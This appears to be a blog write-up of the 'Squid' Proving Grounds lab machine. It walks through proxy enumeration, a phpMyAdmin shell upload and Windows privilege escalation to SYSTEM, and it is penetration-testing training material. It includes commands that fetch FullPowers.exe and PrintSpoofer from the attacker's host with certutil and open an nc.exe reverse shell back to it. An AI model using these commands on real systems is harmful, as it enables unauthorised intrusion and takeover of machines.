Post

Proving Grounds - Squid

Squid was a challenging box that involved utilizing a Squid proxy to discover internal services, exploiting a phpMyAdmin file upload vulnerability to gain initial access, and then escalating privileges using Windows-specific techniques.

The process included using spose to identify internal services, leveraging the proxy to access a WampServer, and ultimately using FullPowers.exe and PrintSpoofer to gain SYSTEM access.

This machine was a great way to practice working with proxy configurations and Windows privilege escalation.

Diagram

graph TD
    A[Host Enumeration]
    A -->|Nmap Scan| B[Identify Squid Proxy]
    B -->|Explore Proxy Configuration| C[Tool: spose]
    C -->|Identify Internal Services| D[Web Service on 8080]
    D -->|Access WampServer| E[Identify phpMyAdmin]
    E -->|Bypass Authentication| F[Upload PHP Shell]
    F -->|Execute Reverse Shell| G[WinPEAS Enumeration]
    G -->|Identify Privilege Escalation| H[Leverage FullPowers.exe]
    H -->|Enable SeImpersonatePrivilege| I[Use PrintSpoofer]
    I -->|Privilege Escalation to SYSTEM| J[Obtain Root Access]
    J -->|Capture Evidence| K[Success]

Information Gathering

Port Scan


  • nmap -sS -Pn -n -T4 192.168.217.189 -p 135,139,445,3128

    Untitled

  • nmap -sVC -p 135,139,445,3128 -n -Pn 192.168.217.189 -v

    Untitled

Enumeration

HTTP 80


Squid is a caching and forwarding HTTP web proxy. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages.

This is the squid repo https://github.com/squid-cache/squid

I was searching in the GitHub, etc., but nothing worked. So i decided to try this:

https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid

  • curl --proxy http://192.168.217.189:3128 http://192.168.45.227Directory Listening in my own machine

    Untitled

So after a while i decided to try this tool https://github.com/aancw/spose.git

  • python spose.py --proxy http://192.168.45.227:3128 --target 192.168.45.227

    Untitled

Ok, verifying if it’s an web page running in 8080

  • curl --proxy http://192.168.217.189:3128 http://192.168.217.189:8080

    Untitled

Now setting up an http proxy with the extension Proxy Switcher https://chrome.google.com/webstore/detail/proxy-switcher-and-manage/onnfghpihccifgojkpnnncpagjcdbjod?ref=benheater.com

  • proxy swithcer

    Untitled

And now trying to access it

Verifying some documentation about phpMyAdmin…

https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

https://gist.github.com/BababaBlue/71d85a7182993f6b4728c5d6a77e669f

Reverse shell must be for windows

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

Priv Escalation


The first thing that i want to do is revoke all firewalls. I’ve tried but the user don’t have permission.

So after a while i decided to put winPEAS inside the machine

Ok, nothing worked, but after enumerate, and after i saw that i was an nt authority but with “local service’

  • whoami

    Untitled

I found this https://itm4n.github.io/localservice-privileges/?ref=benheater.com After read the article i found that he did an script https://github.com/itm4n/FullPowers/releases

  • certutil.exe -urlcache -f http://192.168.45.227/FullPowers.exe FullPowers.exe

    Untitled

  • FullPowers.exe -c "C:\Users\Public\Documents\nc.exe 192.168.45.227 4430 -e cmd" -z sudo rlwrap nc -lvnp 4430

    Untitled

  • whoami /priv → Now i’ve SeImpersoantePrivilage enabled

    Untitled

So i’ll use the https://github.com/itm4n/PrintSpoofer/releases

  • certutil.exe -urlcache -f http://192.168.45.227/PrintSpoofer64.exe PrintSpoofer64.exe

    Untitled

  • PrintSpoofer64.exe -i -c cmd → Priv escalado

    Untitled

  • flag

    Untitled

This post is licensed under CC BY 4.0 by the author.